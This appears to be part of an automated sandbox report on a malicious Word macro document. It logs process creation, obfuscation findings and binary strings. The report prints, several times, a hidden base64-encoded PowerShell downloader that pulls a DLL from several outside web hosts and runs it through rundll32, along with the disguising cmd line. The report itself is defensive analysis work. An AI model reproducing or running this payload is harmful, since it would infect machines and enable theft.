JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAK
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vpdqbmffwwlyu\elrrcydsvvol.uui',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ygrfxgybds\jrwpxihfr.rob',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lydzwviczteg\jfrrzuskryo.byz',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wmhtpvmxcctn\ytalpvmidll.mdf',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Grdxtrtyl\kmtzbbgl.dxh',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wgsitvbdu\kifteejg.dsr',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Extnaatd\rvydpsb.zwq',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rvuszsgopfi\mtjvkbmtlk.dym',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Oqhzdezq\bectafh.dff',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Weiwdqzj\qfklela.qlk',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vvjepckhx\flnsfzgm.bdf',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ikstsciju\uxbijfvp.mja',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096325794.0000000002967000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2096325794.0000000002967000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2096325794.0000000002967000.00000004.00000040.sdmp
                      Source: Binary string: E:\WindowsSDK7-Samples-master\WindowsSDK7-Samples-master\winui\shell\appshellintegration\RecipePropertyHandler\Win32\Release\RecipePropertyHandler.pdb source: powershell.exe, 00000005.00000002.2102033680.0000000003A65000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2100547515.000000001000D000.00000002.00020000.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096325794.0000000002967000.00000004.00000040.sdmp
                      Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2096325794.0000000002967000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096325794.0000000002967000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2095912827.0000000002780000.00000002.00000001.sdmp
                      Source: bestand-8881014518 00944.docInitial sample: OLE summary subject = withdrawal Sports, Toys & Health budgetary management architectures Borders synthesize SSL Usability synergize e-commerce

                      Data Obfuscation:

                      barindex
                      Document contains an embedded VBA with many GOTO operations indicating source code obfuscationShow sources
                      Source: bestand-8881014518 00944.docStream path 'Macros/VBA/Oi5oelv0_s4' : High number of GOTO operations
                      Source: VBA code instrumentationOLE, VBA macro, High number of GOTO operations: Module Oi5oelv0_s4
                      Obfuscated command line foundShow sources
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsA
                      PowerShell case anomaly foundShow sources
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAK
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAK
                      Suspicious powershell command line foundShow sources
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJ